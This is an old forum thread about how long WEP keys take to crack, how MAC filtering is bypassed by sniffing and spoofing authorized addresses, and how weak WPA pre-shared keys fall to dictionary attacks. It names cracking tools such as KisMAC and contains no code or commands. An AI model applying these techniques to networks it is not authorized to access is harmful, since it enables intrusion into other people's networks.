skyfreedomdo
Premium
join:2003-01-01
Boise, ID |  How long would it take to...
... break WEP 64 bit and 128 bit?
Any ideas or *shhh* experiences? |
|
bmn
? ? ?
Premium,ExMod 2003-06
join:2001-03-15
hiatus
 ·Packet8
 ·Cox HSI
| said by skyfreedomdo  :
... break WEP 64 bit and 128 bit?
An hour or two on a REALLY busy network, several hours on a not-so-busy network and probably several days on one not used all that often. You have to capture a couple thousand to a million plus packets for some software.
As for this program, it didn't say whether or not you needed to get the WEP keys first or if the software does it for you by capturing and analyzing the packets. Of course that is assuming that your local WIFi providing cafe actually has WEP turned on, and from casual war driving, many don't.
--
Male by birth... Geek by choice. -- Man... Earth's most foolish child. |
|
skyfreedomdo
Premium
join:2003-01-01
Boise, ID |  Good point on WEP not being used by many. How about TKIP (Temporal Key Integrity Protocol), as anyone read or applied it?
--
SKYFREEDOM NETWORKS
Whatever the angle; We've got you covered. |
|
DSLDUDE
Got The Folding Farm Itch
Premium
join:2002-01-07
Norcross, GA
clubs:  | reply to bmn
I like my MAC filtering. I've tried everything to get past that, and you just can't get in. WEP, MAC, and common sense will prevail over all...
--
»www.fnort.com |
|
skyfreedomdo
Premium
join:2003-01-01
Boise, ID
| I like MAC Filtering but theres always a chance of MAC SPOOFING!
But you are right common sense and, if I might add, knowledge of the enemy out there or within will prevail.
--
SKYFREEDOM NETWORKS
Whatever the angle; We've got you covered. |
|
bmn
? ? ?
Premium,ExMod 2003-06
join:2001-03-15
hiatus
·Packet8
·Cox HSI
| reply to DSLDUDE
Its already been stated, but MAC spoofing will defeat MAC filtering. Most wireless cards have the ability to change the Mac address that is used by the card. I'd post a screenshot of how it can be done (its very easy), but the laptop is packed up in the car.
--
Male by birth... Geek by choice. -- Man... Earth's most foolish child. |
|
DenverDialup
join:2003-06-06
Littleton, CO
clubs:
| reply to DSLDUDE
Well, consider too that WPA is becoming the new standard in wireless security. I don't see why Shmoo has to go write another hacking/phreaking/wardriving tool to "prove an inherent insecurity in 802.11b"...anyone who's spent more than a day looking at wireless technologies today knows how insecure it is. Why not take that effort and translate it into something more useful -- like actually working to make WiFi more secure?
--
"Programming today is a race between software engineers striving to build bigger and better idiot-proof programs, and the Universe trying to produce bigger and better idiots. So far, the Universe is winning." -- Rich Cook |
|
bmn
? ? ?
Premium,ExMod 2003-06
join:2001-03-15
hiatus
·Packet8
·Cox HSI
| said by DenverDialup :
Well, consider too that WPA is becoming the new standard in wireless security.
An article came out not long ago that stated that WPA is not much more secure than WEP and can still be broken.
--
Male by birth... Geek by choice. -- Man... Earth's most foolish child. |
|
BeesTea
Network Janitor
Premium,VIP
join:2003-03-08
00000
| reply to bmn
Sure, changing your MAC is not hard. That isn't spoofing and it isn't "defeating" anything at all. You're literally becoming a device allowed to connect to the WAP. Now here's the interesting part. Can you explain the process of knowing what to set your MAC to in order to gain access to the WAP ?
On the issue of WEP, it isn't intended to provide strong cryptographic communication. WEP means "Wired Equivalent Privacy". That is, just as a wire holds the signal, keeping it from being intercepted easily, WEP keeps signal from being eavesdropped on easily.
This is another example of why the physical layer is NOT where security is applied for the average network. Wireless or otherwise.
Cheers,
-BeesT
--
2b2b2b415448300d |
|
shmoe1
join:2003-09-06
Fremont, CA
| reply to bmn
One article about WPA vulnerability I've encountered was by Robert Moskowitz, senior technical director at ICSA Labs.
It details problems with the pre-shared key of less than 20 characters with simple pass phrases that were vulnerable to a dictionary attack. Complex passphrases of longer than 20 characters seem to be less of a security issue.
Also, I also read that WPA is just as vulnerable as WEP to denial-of-service attacks.
If others can point to other articles or specific problems it would be useful.
Thanx |
|
bmn
? ? ?
Premium,ExMod 2003-06
join:2001-03-15
hiatus
·Packet8
·Cox HSI
| reply to BeesTea
said by BeesTea :
Can you explain the process of knowing what to set your MAC to in order to gain access to the WAP ?
It would involve sniffing traffic on that WLAN. You would then be able to detect the MAC address of a system associated with the WLAN that is your target. I haven't actually done it (over the black hat stuff), so the mechanics of doing it are not 100% in my skillset, but the conceptual process can be found elsewhere.
quote:
That is, just as a wire holds the signal, keeping it from being intercepted easily, WEP keeps signal from being eavesdropped on easily.
That was its intended purpose, but some rely on it solely for access and information protection. I always grin when people fire up something like telnet and login via a wireless connection. Of course without WEP, a network is just waiting to be had.
--
Male by birth... Geek by choice. -- Man... Earth's most foolish child. |
|
NotAHacker
@dbma.com
| How hard is it to spoof a MAC address? Well, if you have the software and knowledge to determine WEP keys, you already have everything you need to also learn all the authorized MAC addresses on that WLAN.
I'm not going into further detail, even though the info is widely available on the Internet. |
|
sporkme
drop the crantini and move it, sister
Premium,MVM
join:2000-07-01
Budd Lake, NJ
·Optimum Online
| reply to BeesTea
said by BeesTea :
Now here's the interesting part. Can you explain the process of knowing what to set your MAC to in order to gain access to the WAP ?
Just run your favorite sniffer for a while. The frame headers are NOT encrypted when WEP is enabled. So it's actually pretty easy. I've been toying with "KisMac" and it's pretty simple. It's totally point-n-drool. Right click on a node and there's a menu item "Find Key". With a moderate amount of traffic this happens in less than a half hour.
WEP is fundamentally broken. I don't mind the idea of encrypting at L2, but they chose a very weak algorithm.
--
just a minute |
|
aitech
Guru. Kneel
join:2000-12-19
Boston, MA
clubs: | Has anyone gotten a successful port of Kismet into windows yet, or is it still alpha?
And anyone have any idea when netstumbler .4 is coming yet? |
|
BeesTea
Network Janitor
Premium,VIP
join:2003-03-08
00000
edit:
November 26th, @08:10PM
| reply to bmn
said by bmn :
It would involve sniffing traffic on that WLAN. You would then be able to detect the MAC address of a system associated with the WLAN that is your target. I haven't actually done it (over the black hat stuff), so the mechanics of doing it are not 100% in my skillset, but the conceptual process can be found elsewhere.
That's an interesting concept. It was my understanding that by frequency variation the clients were not able to see one another, hence the need for a WAP. Does this require the NIC to be in adhoc mode ? I wish I had more than just my laptop running on 802.11 here to play with.
I've been looking for a bit this evening and can't find any method that doesn't require using crazy radio frequency tools. There are some funky white papers on parsing radio streams in the unlicensed frequency ranges but they seem to be more "find the person snooping your cordless phone" type stuff.
If you happen to find anything on this please let me know, as that's not at all how I understood it to operate.
Cheers,
-BeesT
OK, I've scoured the seatle wireless mailing list archive and it seems my understanding of how this works is based on modern 802.11 card implimentations. Newer cards aparently make it non-trivial to intercept packets on the way to the WAP or vice-verse. Presumably older cards with new firmware would also reduce this risk.
--
2b2b2b415448300d |
|
